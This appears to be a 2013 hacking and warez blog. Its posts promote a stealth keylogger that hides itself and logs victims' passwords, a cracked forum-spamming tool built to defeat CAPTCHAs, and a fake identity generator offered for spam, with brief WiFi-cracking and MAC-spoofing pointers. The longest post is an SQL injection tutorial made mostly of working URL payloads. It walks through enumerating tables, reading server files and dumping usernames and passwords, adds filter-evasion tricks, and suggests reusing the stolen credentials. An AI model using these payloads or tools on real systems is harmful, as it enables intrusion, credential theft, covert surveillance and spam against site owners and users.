Thursday 15 August 2013

Award Keylogger Pro 3.0 (x86/x64) | 9.5 MB | Uploaded |

Award Keylogger Pro 3.0 (x86/x64) | 9.5 MB
Award Keylogger allows you to monitor all users' activity on any computers in real time and record each computer's usage history. Award Keylogger makes it easy to view, in real time, the screenshots of the any computers, all typed keystrokes, visited Web sites, used programs. You can view a list of running processes and terminate undesirable ones.
Main Features:
• New! Run keylogger as a Windows service
• Easy-to-use, even for beginners
• Absolutely invisible/stealth mode
• Logs accounts and p***words typed in the every application
• Logs message typed in all instant messengers
• Visual surveillance, support screenshots view
• Slide show for screenshots
• Captures the contents behind the asterisks
• Captures mouse clicks
• Logs websites visited
• Captures AOL/AIM/Yahoo/ICQ chats
• Keyword Detection and Notification
• Records contents of p***word protected web pages, including Web Mail messages
• Logs Windows Clipboard
• Sends log by e-mail
• Uploads ALL logs into the separate folders by FTP
• Invisible for the firewall program
• Invisible in the Windows startup list
• Monitors all users of the PC
• User friendly HTML file format for emailed logs
• Invisible in Windows NT/2000/XP Task Manager and Windows 9.x/Me Task List
• Records Windows 9.x/Me/2000/XP/VISTA logon p***words
• Intercepts DOS-box and Java-chat keystrokes
• Supports international keyboards
• External log viewer
• Supports printing of the log
• Optimized for Windows XP
• Exports log to HTML

XRumer 5.05 (Incl Crack)

XRumer Crack is the premier automated link-building tool.
Through the use of this tool you will see a significant increase in the number of unique visitors to your site, as well as see your site jump in the search engine result pages. The tool is popular among both novices and gurus because of both its flexibility, power, and effectiveness. Xrumer Crack is extremely reliable and its fully automated workflow makes link-building a breeze.
XRumer Crack is a software application that automatically posts your messages to forums, guestbooks, bulletin boards and catalogs of the links (as well as into livejournals and wiki). In a word it is an autosubmitter.

Below are listed main specification and features of XRumer:-

Multithreaded submitting: over 50 simultaneously running threads possible!
Software can perform registration at forums (if necessary for posting messages) and automatically fill in the required fields. Upon successful registrationXRumer Crack posts the user-specified message and/or links.
The powerful built-in proxy-server checking script locates available proxy-servers worldwide, choosing anonymous addresses among them.Software is able to work with lots of different types of forums and guestbooks: phpBB and PHP-Nuke with any modifications, yaBB, VBulletin, Invision Power Board, IconBoard, UltimateBB, exBB, phorum.org, wiki, different types of bulletin boards and even custom-written code.
Attention: unique feature – software works around EVERY possible type of protection from automatic registration, including:
- Pictocode protection (tickets, captcha), which look something like: “Enter the number you see in the box”. Details…
- E-mail activation protection. Details…
- Java-script protection. Details…
During the process of posting a detailed log is created with precise path-links to posted messages so that you can check every link and every posted message afterwards.
A built-in proprietary “Question-answer” system.
A variations system, using which you can post up to 10000 messages all looking different but with similar contextual meaning and the user-defined hyperlinks in them. It helps to broaden the key queries (for Search Engine optimization) and protect your posts from being filtered out by Search Engines (that is, your posts will be included in SERPs).If the forum has more than one category, the software chooses the one most suitable for the message, otherwise it sends the message to off-top, flame sections or the like, and in case those do not exist – to the most visited category on the forum.
BB-code can be used.
The following forum base processing tools are included: repeated links deletion, hit descending sort, service denial according to customizable black list, and various filters. The program informs the users about availability of new versions and possesses many other powerful features.The system is fully user-independent and requires minimum skills to handle: you only need to choose the proper links database, create a message text with one or several hyperlinks and hit the ‘Start’ button.Direct Download
Password:- www.warez-home.net

Wednesday 14 August 2013

fake name generator

This is my fakenamegenerator I also added free US virtual number to send & receive SMS.So hurry up to get your free virtual number with credits too.U can use it for anything u want verifyng accounts, making surveys spam,Foolish now its more easy.Non.Download Here

Wednesday 12 June 2013

Tutorial Frend Wi-Fi Cracker Videos






This tutorial is for people that like to crack WEP the easy way although its not all that easy in my previous post we looked at How to Crack WiFi Network easily using Aircrack-NG for Linux OS today in this tutorial we will be cracking a WiFi network using FERN WiFi CRACKER which is a GUI (Graphical User Interface) for Aircrack-NG.
Before we go into this tutorial you need to first of all  Click here to Download Fern WiFi Cracker After the Download is complete  Open FERN WiFi CRACKER using the following commmand - See more at:


 

CHANGE MAC ADDRESS IN BACKTRACK 4



1] For changing mac address to 11:12:43:44:75:56 (let say) 2] Just type -     macchanger --mac 11:12:43:44:75:56 eth0 3] eth0 is the interface name.     Use ifconfig command to check primary interface card. 4] get back the original mac address     This spoof mac address is not permanent, original mac is restored after reboot.     Without reboot, for getting back to original mac address-        type-     macchanger -s eth0     (this will list the original mac address of eth0 interface)     macchanger --mac originalmac eth0     (it will set the original mac address)

Saturday 8 June 2013

SQL Injection Tutorial [Union Based]

Hi folks..This time I m posting a good Sql injection tutorial by End3r, which I found quite interesting to read and a Gem to share. This SQL injection tutorial will clear your most of sql injection doubts and will cleanly phase in an attack strategy for you. SQL Injection is defined by http://www.h-spot.net/threat_glossary.htm as:

"The act of entering malformed or unexpected data (perhaps into a front-end web form or front-end application for example) so that the back-end SQL database running behind the website or application executes SQL commands that the programmer never intended to permit, possibly allowing an intruder to break into or damage the database."
Background Information

It is considered the most common web vulnerability today
It's a flaw in the web application--not the db, or the server
Can be injected into: Cookies, Forms, and URL parameters

Lesson Facts

This lesson uses MySQL syntax for all examples.
This lesson does not provide reasons for why sites are vulnerable, simply how to exploit them
This lesson only provides sql injection examples for url parameters such it is such a large subject on it's own
This lesson gives small examples of filter evasion techniques

The Lesson

Some commands you will need to know: 


'union all select' : combines two or more select statements into one query and returns all rows
'order by' : used to sort rows after a select statement is executed
'load_file()' : loads a local file from the site or server examples would be .htaccess or /etc/passwd
'char()' : used to change decimal ascii to strings, can be used for filter evasion--in sql injections, used in conjunction with load_file
'concat()' : combines more than one column into a single column, enabling more columns to be selected than the number that are showing on the page (You will understand better later)
'—' : a comment
'/*' : another type of comment
Injection SQL Queries into URL Parameters

So you've found a site: '
http://www.site.com/index.php?id=5'
and want to test if it's vulnerable to SQL Injections. Begin by checking if you can execute some of your own queries, so try: 
/index.php?id=5 and 1=0--
If after executing the above statement, nothing has happened and the page has remained the same, you can try: 
/index.php?id='
If neither of those work, for the purposes of this tutorial move on to another site. Otherwise, if a blank page showed up you just might be in luck!
Now we want to find how many columns and which ones are showing when the select statement is executed so we use: 
/index.php?id=5 order by 20
If you get an error decrement the number 20, if there is no error continue incrementing until you get one and then the number just before your error is the number of columns in the table you're selecting from.
Example:
/index.php?id=5 order by 15 <--returns 16="" but="" by="" error="" id="5" index.php="" no="" order="" p="">
returns an error, then we know that there are 15 columns in our select statement.The next statement will null the id=5 so the script only executes our commands and not it's own, and show us which columns we can extract data from:  
/index.php?id=null union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--
The comment comments out anything the script would append to the end of the statement so that only our statement is looked at.So now look at the page and if you see any of the numbers you just typed in, you know those columns are showing, and we can gather information from them. For this example let's pretend columns 5, 7, and 9 are showing.Now we can begin gathering information!
/index.php?id=null union all select 1,2,3,4,user(),6,database(),8,version(),10,11,12,1 3,14,15--
As you can see we selected values from the showing columns, what if we want to clean this up a bit, and put all of those selected values in one column? This is where concat() comes in: 
/index.php?id=null union all select 1,2,3,4,concat(user(),char(58),database(),char(58) ,version()),6,7,8,9,10,11,12,13,14,15--
Now look at your page, user(), database(), and version() are all in one place, and are separated by a colon this demonstrates the use of concat() and char().
The user() will usually give something like username@localhost, but you may get lucky and get username@ipaddresshere, in this instance you can try to brute force the FTP login. The version would help you look up exploits for that version of the database() in use--but only if you're a skiddy!
Before we can check if we have load_file perms, we must get an FPD (Full Path Disclosure) so we know exactly where the files are located that we're trying to open. Below are some methods to get an FPD:
/index.php?id[]= 
You could attempt to Google the full path of the site by trying something like "/home/sitename" and hoping that you'll find something in Google
Session Cookie Trick
Thanks to haZed at enigmagroup.org. In the url type: 
'java script:void(document.cookie="PHPSESSID=");'
This will give a session_start() error and an FPD.
Now we will attempt to use load_file(), this example will load the .htaccess file, make sure you know the file you're trying to load actually exists or you may miss out on your opportunity to realize what great perms you have: 
/index.php?id=null union all select 1,2,3,4,load_file(char(47, 104, 111, 109, 101, 47, 115, 105, 116, 101, 110, 97, 109, 101, 47, 100, 105, 114, 47, 97, 108, 108, 111, 102, 116, 104, 105, 115, 105, 115, 102, 114, 111, 109, 111, 117, 114, 102, 112, 100, 47, 46, 104, 116, 97, 99, 99, 101, 115, 115)),6,7,8,9,10,11,12,13,14,15--
If you see the .htaccess file, congrats! You have load_file() perms. Now try to load include files such as config.inc.php for database usernames and passwords, hoping that the admin is dumb enough to use the same username and password for ftp. Another idea would be to load .htpasswd after finding it's location from .htaccess and then logging in to all the password-protected areas that you want to on the site.
If you don't see the .htaccess file, I will include one more way to extract info by using sql injections.

Using information_schema.tables

So you don't have load_file() perms? No problem, we can check for information_schema.tables.
1) 'table_name' is the name of a table that exists in all information_schema tables on every site: 
/index.php?id=null union all select 1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15 from information_schema.tables--
If the site is showing information_schema.tables, the words CHARACTER_SETS' will appear in column 5. What can I do with CHARACTER_SETS you might be wondering. Well, nothing that I'm going to show you, but you can find out other tables that exist on the site. The information_schema.tables contains a list of every table in the database on the site, so you can pull up the table username and maybe password if they exist...Then what do you think the information_schema.columns hold? That's right, a list of all the columns on the site. So rather than using just the above injection you could try any of the following: 
-/index.php?id=null union all select 1,2,3,4,distinct table_name,6,7,8,9,10,11,12,13,14,15 from information_schema.tables—

Selects all 'distinct' table names from information_schema.tables, meaning it will print out all tables at one time  
-/index.php?id=null union all select 1,2,3,4,concat(table_name,char(58),column_name),6, 7,8,9,10,11,12,13,14,15 from information_schema.columns—
Selects all tables and columns that go with each table seperated by a colon
2) If none of the above queries give you anything except for 'CHARACTER_SETS' you will have to use enumeration to determine the names of the other tables: 
/index.php?id=null union all select 1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15 from information_schema.tables where table_name != "CHARACTER_SETS"--
Then it would show the next table in line so you would modify the above to say: 
where table_name != "CHARACTER_SETS" and table_name != "nexttableinline"-
Until no more tables show, then you can do the same for the columns.
3) Now after you've executed one or all of those statements, let's say you found the table 'users' and it has the columns 'username', 'password', 'id', and 'email'. To extract that info from the table, use: 
/index.php?id=null union all select 1,2,3,4,concat(username, char(58), password, char(58), id, char(58), email),6,7,8,9,10,11,12,13,14,15 from users---
And you'll get the info you requested, of course you can modify that as you like such as: 

-/index.php?id=null union all select 1,2,3,4,username,6,password,8,9,10,11,12,13,14,15 from users where id=1--
-/index.php?id=null union all select 1,2,3,4,concat(password, char(58), id, char(58), email),6,7,8,9,10,11,12,13,14,15 from users where username='Admin'
Replacing Admin with the top user's name such as admin or owner etc..

Final Tips
With any luck, one of these methods has worked for you and you were able to accomplish your goal. However, if none of them worked, you can start guessing common table names and then columns:

/index.php?id=null union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 from users 
If the page shows up, you know the table exists and you can start guessing column names:
/index.php?id=null union all select 1,2,3,4,username,6,7,8,9,10,11,12,13,14,15 from users
If you get a username, good job you guessed a correct table and column, otherwise keep guessing.

Filter Evasion Techniques

You can URL Encode characters, hex encode them, use any encoding you like as long as your browser can interpret it
Rather then using 'union all select' try 'UniON aLL SeLECt' to see if the filter checks case
Try using the plus sign to split words up: ' 'uni'+'on'+' '+'all'+' '+'Se'+'lect'
Combine the methods mentioned above using different cases, the plus operator, and not just text but encoding as well
Be creative

Conclusion
As End3r summarises it -
“Thank you for reading my article, please comment if you found it interesting, found it helpful, or even hated it.
I'd like to thank Rebirth, killerguppy101, & Cr1t1cal for helping me get interested in and learn more about SQL Injections.
Thanks for reading,”
Source


How to Track wi-fi Hackers

Got a Wi-Fi net connection ? And do you think it is secure enough ? With the onset of cyber crimes taking place,your Wi-fi Wi-Fi Compromised / Hacked ?may be used illegally by hackers or some other people.Either you may get high internet bills in reward or you may be on headlines as your net may be compromised to send malicious emails to anyone,that's what happened in India sometime ago in Mumbai Bomb blast case. Well,there comes MoocherHunter™ to rescue.MoocherHunter™ is a mobile tracking software tool for the real-time on-the-fly geo-location of wireless moochers and hackers. If you have ever wondered about the possibility of your wireless network getting used for illegal purposes, you must consider using Moocher Hunter. Using Moocher Hunter you can identify the location of the person i.e. an unauthorized user using your wireless network. Its then upto you to either give him a stern warning of not using your wireless network again or complaining to the legal authorities.Recently Indian Police and RAW (Research and Analysis Wing) used Moocher Hunter to track the source of email which was sent from an unsecured Wi-Fi network from the home of an American expatriate,whose Network was compromised as someone wardived to use his net connection and send an email that took responsibility for a bomb blast that killed at least 42 people.MoocherHunter is FREE to use and can easily predict the physical location of the computer using the WiFi connection.
The algorithms applied use various signal variables to accurately predict the position of the connected laptop/machine and allows to identify the location of an 802.11-based wireless moocher or hacker by the traffic they send across the network.MoocherHunter™ allows to pinpoint the location of a WIFI hacker upto an accuracy of 2 meters within an average of 30 minutes.Moocherhunter is the ultimate Wifi hacker tracker tool and its a must for every Network security specialist,White hats,Black hats,Green and Grey hats out there.